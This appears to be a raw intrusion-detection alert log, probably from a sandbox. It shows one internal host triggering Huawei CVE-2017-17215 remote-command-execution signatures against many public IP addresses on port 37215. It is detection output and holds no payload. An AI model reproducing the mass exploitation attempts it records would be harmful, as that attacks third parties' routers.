                                                    07/10/24-08:27:27.171053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4843637215192.168.2.14157.202.235.3
                                                    07/10/24-08:26:52.088542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5985437215192.168.2.14197.207.48.246
                                                    07/10/24-08:26:53.213909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3438437215192.168.2.14197.146.20.36
                                                    07/10/24-08:27:32.545025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4255037215192.168.2.1441.127.237.182
                                                    07/10/24-08:27:19.226208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3352037215192.168.2.14192.153.42.195
                                                    07/10/24-08:26:59.856885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6037237215192.168.2.14197.93.86.75
                                                    07/10/24-08:26:45.583882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5033237215192.168.2.14197.164.147.180
                                                    07/10/24-08:27:24.863618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717637215192.168.2.1423.101.144.46
                                                    07/10/24-08:27:32.602329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4376037215192.168.2.14101.173.19.241
                                                    07/10/24-08:26:13.803264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4801237215192.168.2.14197.38.45.218
                                                    07/10/24-08:26:31.083408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4322837215192.168.2.14157.253.211.46
                                                    07/10/24-08:27:02.786034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3416837215192.168.2.14157.67.108.172
                                                    07/10/24-08:26:25.449750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3843837215192.168.2.14197.251.28.223
                                                    07/10/24-08:27:02.831621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5410637215192.168.2.14197.14.253.87
                                                    07/10/24-08:27:30.542480TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5454837215192.168.2.1441.167.36.81
                                                    07/10/24-08:26:17.948399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5973437215192.168.2.14197.105.121.218
                                                    07/10/24-08:26:47.851193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3540637215192.168.2.14157.94.215.147
                                                    07/10/24-08:27:23.822671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5562237215192.168.2.1441.29.196.84
                                                    07/10/24-08:26:33.256885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4311437215192.168.2.14157.14.90.25
                                                    07/10/24-08:26:47.832991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3578637215192.168.2.14197.241.245.243
                                                    07/10/24-08:27:08.411856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4090237215192.168.2.14197.230.108.181
                                                    07/10/24-08:26:13.776398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4870437215192.168.2.1441.216.165.13
                                                    07/10/24-08:26:22.262927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6066237215192.168.2.1435.180.222.151
                                                    07/10/24-08:27:22.878733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4657437215192.168.2.14157.97.0.164
                                                    07/10/24-08:26:36.378421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3997237215192.168.2.1484.222.95.153
                                                    07/10/24-08:27:28.088837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4297037215192.168.2.14197.200.84.31
                                                    07/10/24-08:26:23.333013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4470237215192.168.2.14209.33.24.150
                                                    07/10/24-08:26:33.165802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3769837215192.168.2.1437.186.224.51
                                                    07/10/24-08:26:28.795318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3632637215192.168.2.1441.236.78.85
                                                    07/10/24-08:26:11.176119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5084237215192.168.2.14157.16.184.209
                                                    07/10/24-08:27:03.035788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4397437215192.168.2.14197.168.160.241
                                                    07/10/24-08:27:32.581630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5894637215192.168.2.1474.123.191.215
                                                    07/10/24-08:26:59.661983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5735237215192.168.2.14157.74.147.234
                                                    07/10/24-08:26:41.595254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3456237215192.168.2.14157.80.49.160
                                                    07/10/24-08:27:08.456007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3512437215192.168.2.14197.87.156.197
                                                    07/10/24-08:26:26.588123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4205837215192.168.2.14197.231.54.94
                                                    07/10/24-08:26:43.543257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5187237215192.168.2.14197.173.93.60
                                                    07/10/24-08:26:22.287324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4976237215192.168.2.14157.4.150.118
                                                    07/10/24-08:27:02.972894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5346237215192.168.2.1441.149.238.162
                                                    07/10/24-08:26:53.140498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5089237215192.168.2.14197.201.169.13
                                                    07/10/24-08:27:22.859417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4520037215192.168.2.1441.56.221.16
                                                    07/10/24-08:27:13.761969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5369837215192.168.2.14221.157.227.79
                                                    07/10/24-08:26:38.551619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4157837215192.168.2.14157.50.184.123
                                                    07/10/24-08:26:55.393096TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4461237215192.168.2.14197.62.188.138
                                                    07/10/24-08:26:33.233567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3867837215192.168.2.14157.35.91.176
                                                    07/10/24-08:26:28.637197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6076237215192.168.2.14197.212.152.96
                                                    07/10/24-08:26:59.771211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4714837215192.168.2.14197.150.154.95
                                                    07/10/24-08:26:43.526771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3405437215192.168.2.1441.11.131.74
                                                    07/10/24-08:26:52.056548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3507237215192.168.2.14157.178.80.245
                                                    07/10/24-08:27:14.885160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5806637215192.168.2.1441.166.124.101
                                                    07/10/24-08:27:24.913087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3934037215192.168.2.14116.164.243.68
                                                    07/10/24-08:27:19.301991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3742437215192.168.2.14197.191.22.199
                                                    07/10/24-08:26:43.910396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4778437215192.168.2.14197.129.70.213
                                                    07/10/24-08:26:59.566844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4110637215192.168.2.14197.212.19.65
                                                    07/10/24-08:27:27.047210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5748437215192.168.2.1441.134.122.188
                                                    07/10/24-08:27:31.573908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3855837215192.168.2.1457.125.195.254
                                                    07/10/24-08:27:14.875221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3662037215192.168.2.1449.161.210.149
                                                    07/10/24-08:27:22.838933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4144837215192.168.2.14157.230.126.102
                                                    07/10/24-08:27:32.545025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4924037215192.168.2.1441.49.237.210
                                                    07/10/24-08:26:11.565192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435437215192.168.2.14197.99.88.80
                                                    07/10/24-08:26:11.661764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3359037215192.168.2.1441.170.52.142
                                                    07/10/24-08:27:05.159801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3989037215192.168.2.14157.187.57.38
                                                    07/10/24-08:26:28.787394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3835037215192.168.2.1441.215.244.238
                                                    07/10/24-08:26:34.179823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5745637215192.168.2.1441.18.33.179
                                                    07/10/24-08:27:13.889582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4024237215192.168.2.14197.106.240.163
                                                    07/10/24-08:26:38.552864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4524837215192.168.2.1440.186.5.115
                                                    07/10/24-08:27:23.965651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4241237215192.168.2.14219.108.167.94
                                                    07/10/24-08:26:11.130585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5442437215192.168.2.14125.79.62.244
                                                    07/10/24-08:27:08.389213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4950037215192.168.2.14197.36.89.116
                                                    07/10/24-08:27:19.290878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4010837215192.168.2.1491.72.39.158
                                                    07/10/24-08:27:28.176056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5611237215192.168.2.1441.61.108.2
                                                    07/10/24-08:26:17.969551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5730637215192.168.2.1441.76.108.16
                                                    07/10/24-08:26:45.624284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3523237215192.168.2.14157.238.127.102
                                                    07/10/24-08:26:36.433222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3552037215192.168.2.1441.111.187.180
                                                    07/10/24-08:26:34.224175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3960237215192.168.2.14197.106.172.225
                                                    07/10/24-08:26:49.853498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4885237215192.168.2.14157.87.238.141
                                                    07/10/24-08:27:24.983854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3448037215192.168.2.14181.26.159.243
                                                    07/10/24-08:27:08.373909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6014837215192.168.2.1441.225.112.173
                                                    07/10/24-08:27:13.815716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3901237215192.168.2.1441.56.109.70
                                                    07/10/24-08:26:36.441916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5759637215192.168.2.14131.29.98.254
                                                    07/10/24-08:26:41.421188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5984837215192.168.2.1441.34.43.14
                                                    07/10/24-08:26:14.623309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5591237215192.168.2.14197.12.236.158
                                                    07/10/24-08:26:28.926953TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4568637215192.168.2.14197.251.235.140
                                                    07/10/24-08:26:38.596556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4602637215192.168.2.14198.201.75.251
                                                    07/10/24-08:26:22.247004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5414637215192.168.2.14177.193.104.254
                                                    07/10/24-08:27:31.570253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5554237215192.168.2.14197.124.58.101
                                                    07/10/24-08:27:07.327851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3302237215192.168.2.14179.6.120.76
                                                    07/10/24-08:27:33.764510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5853037215192.168.2.14197.226.242.16
                                                    07/10/24-08:26:33.259774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3872637215192.168.2.1441.165.83.146
                                                    07/10/24-08:26:55.433517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5496837215192.168.2.14223.10.102.238
                                                    07/10/24-08:26:59.603648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4649837215192.168.2.14157.37.104.41
                                                    07/10/24-08:26:15.867031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4104437215192.168.2.1491.0.2.130
                                                    07/10/24-08:26:18.013020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3610037215192.168.2.14100.251.33.173
                                                    07/10/24-08:27:05.090396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3816437215192.168.2.14197.38.85.178
                                                    07/10/24-08:27:14.882179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5567637215192.168.2.14197.78.45.251
                                                    07/10/24-08:26:59.553454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4459037215192.168.2.14197.67.9.39
                                                    07/10/24-08:26:14.825440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4002037215192.168.2.1485.40.141.71
                                                    07/10/24-08:27:19.250416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5234637215192.168.2.14157.204.121.24
                                                    07/10/24-08:26:34.196325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3744837215192.168.2.14149.125.73.21
                                                    07/10/24-08:27:22.930500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5752437215192.168.2.14157.245.57.56
                                                    07/10/24-08:27:22.535302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3313637215192.168.2.14197.164.77.229
                                                    07/10/24-08:26:11.583979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4152037215192.168.2.14157.147.144.222
                                                    07/10/24-08:27:33.952249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3974037215192.168.2.14157.193.93.72
                                                    07/10/24-08:26:42.401812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5108237215192.168.2.1441.27.11.134
                                                    07/10/24-08:26:57.515772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4543837215192.168.2.1471.231.245.42
                                                    07/10/24-08:27:19.208740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952437215192.168.2.1441.236.85.241
                                                    07/10/24-08:26:26.598533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3653437215192.168.2.14202.63.94.59
                                                    07/10/24-08:26:59.610357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4228837215192.168.2.14155.66.138.150
                                                    07/10/24-08:27:05.200421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4289637215192.168.2.14157.166.231.92
                                                    07/10/24-08:27:20.492673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4434837215192.168.2.1497.245.252.77
                                                    07/10/24-08:26:43.695962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5116637215192.168.2.14157.38.248.159
                                                    07/10/24-08:27:20.434935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5908837215192.168.2.1441.29.26.245
                                                    07/10/24-08:27:08.417539TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4255637215192.168.2.14157.87.128.66
                                                    07/10/24-08:26:49.802852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3697437215192.168.2.14157.49.164.177
                                                    07/10/24-08:26:25.433410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4210037215192.168.2.1441.89.153.226
                                                    07/10/24-08:27:24.962924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4161237215192.168.2.14197.172.35.98
                                                    07/10/24-08:26:55.322018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4670837215192.168.2.14157.31.38.55
                                                    07/10/24-08:27:30.516492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5401637215192.168.2.1441.26.59.93
                                                    07/10/24-08:26:42.450932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3629637215192.168.2.1441.91.131.183
                                                    07/10/24-08:26:59.865437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4053637215192.168.2.14197.74.160.203
                                                    07/10/24-08:26:55.278007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3292037215192.168.2.1441.94.250.3
                                                    07/10/24-08:26:43.766311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3873437215192.168.2.14197.199.130.210
                                                    07/10/24-08:27:33.881994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3998037215192.168.2.14157.173.5.246
                                                    07/10/24-08:26:53.145999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3389037215192.168.2.14197.140.246.167
                                                    07/10/24-08:26:29.829740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4378237215192.168.2.14157.32.54.192
                                                    07/10/24-08:26:57.631188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5461837215192.168.2.1482.7.10.106
                                                    07/10/24-08:26:48.004841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5221237215192.168.2.14157.159.222.17
                                                    07/10/24-08:26:26.510186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4713037215192.168.2.14157.98.246.41
                                                    07/10/24-08:26:36.368496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4662437215192.168.2.14157.250.249.115
                                                    07/10/24-08:26:38.603168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4638237215192.168.2.1441.250.205.215
                                                    07/10/24-08:26:28.918557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5890237215192.168.2.14159.185.41.30
                                                    07/10/24-08:26:23.351909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3587837215192.168.2.14197.116.90.202
                                                    07/10/24-08:26:22.237344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4307237215192.168.2.1441.68.124.4
                                                    07/10/24-08:26:18.006056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3906837215192.168.2.1441.243.192.149
                                                    07/10/24-08:26:59.778453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3705837215192.168.2.14197.38.62.226
                                                    07/10/24-08:26:13.842272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4097637215192.168.2.1490.72.130.32
                                                    07/10/24-08:26:52.093940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5071437215192.168.2.14197.14.245.4
                                                    07/10/24-08:26:29.826099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5214637215192.168.2.14157.83.14.147
                                                    07/10/24-08:26:13.647061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4353237215192.168.2.1441.61.49.105
                                                    07/10/24-08:26:22.258130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4243237215192.168.2.14197.49.178.41
                                                    07/10/24-08:26:11.136584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4165437215192.168.2.14157.185.35.87
                                                    07/10/24-08:26:52.056548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3497437215192.168.2.14197.184.91.241
                                                    07/10/24-08:26:18.014654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4656837215192.168.2.1441.198.21.93
                                                    07/10/24-08:27:11.480663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4461037215192.168.2.1441.79.146.175
                                                    07/10/24-08:26:52.064971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6092237215192.168.2.1441.245.236.203
                                                    07/10/24-08:26:59.652000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5839437215192.168.2.1441.136.58.43
                                                    07/10/24-08:26:48.019376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4629037215192.168.2.14157.232.245.26
                                                    07/10/24-08:27:24.970064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3532037215192.168.2.1459.0.99.178
                                                    07/10/24-08:26:20.173422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4959837215192.168.2.1441.109.176.145
                                                    07/10/24-08:26:26.589872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5118437215192.168.2.14189.190.93.48
                                                    07/10/24-08:26:29.887223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4072437215192.168.2.14157.216.217.220
                                                    07/10/24-08:26:52.078172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4406037215192.168.2.1441.193.43.248
                                                    07/10/24-08:26:42.179798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5755837215192.168.2.14197.195.223.80
                                                    07/10/24-08:26:59.728995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5876637215192.168.2.1441.42.250.1
                                                    07/10/24-08:27:32.513805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3737637215192.168.2.1441.2.88.97
                                                    07/10/24-08:26:11.572595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3669037215192.168.2.14103.53.85.88
                                                    07/10/24-08:26:51.960962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3649837215192.168.2.14197.240.191.39
                                                    07/10/24-08:26:20.113907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4378637215192.168.2.14197.42.255.103
                                                    07/10/24-08:26:55.433517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5000837215192.168.2.14197.161.188.99
                                                    07/10/24-08:27:02.923335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5453837215192.168.2.14157.113.82.163
                                                    07/10/24-08:27:08.456007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5531437215192.168.2.14198.230.204.67
                                                    07/10/24-08:27:32.540139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4869437215192.168.2.14131.244.216.150
                                                    07/10/24-08:26:42.463708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3339637215192.168.2.1441.201.133.100
                                                    07/10/24-08:27:02.831621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5527837215192.168.2.1420.18.109.234
                                                    07/10/24-08:27:11.546125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3558837215192.168.2.14157.208.71.194
                                                    07/10/24-08:26:41.455036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3972237215192.168.2.14197.220.182.108
                                                    07/10/24-08:27:23.903843TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3284037215192.168.2.1441.160.32.81
                                                    07/10/24-08:26:23.347150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4181637215192.168.2.14197.168.9.158
                                                    07/10/24-08:26:41.489365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4066037215192.168.2.14158.150.136.148
                                                    07/10/24-08:27:30.505876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4237037215192.168.2.14157.177.168.50
                                                    07/10/24-08:26:13.824785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3481637215192.168.2.14166.13.183.126
                                                    07/10/24-08:27:32.590105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4451437215192.168.2.14157.1.62.15
                                                    07/10/24-08:26:26.483637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4106037215192.168.2.14197.40.141.157
                                                    07/10/24-08:26:36.406551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5104637215192.168.2.14157.255.119.182
                                                    07/10/24-08:26:48.002898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4709637215192.168.2.14157.131.65.196
                                                    07/10/24-08:26:13.824276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6008437215192.168.2.14157.20.113.153
                                                    07/10/24-08:26:38.588104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4246437215192.168.2.1441.57.75.84
                                                    07/10/24-08:27:22.924312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4491237215192.168.2.14157.197.100.236
                                                    07/10/24-08:26:53.202675TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4937437215192.168.2.14157.111.200.182
                                                    07/10/24-08:26:31.084191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4349437215192.168.2.14197.201.143.87
                                                    07/10/24-08:26:31.056369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4486837215192.168.2.14197.122.154.92
                                                    07/10/24-08:27:17.093550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4930037215192.168.2.1441.57.87.237
                                                    07/10/24-08:27:31.467036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4001637215192.168.2.14197.147.154.119
                                                    07/10/24-08:26:38.630697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3339637215192.168.2.14146.195.246.242
                                                    07/10/24-08:27:30.521330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4377237215192.168.2.14157.95.140.48
                                                    07/10/24-08:26:28.775037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3930037215192.168.2.14157.62.33.234
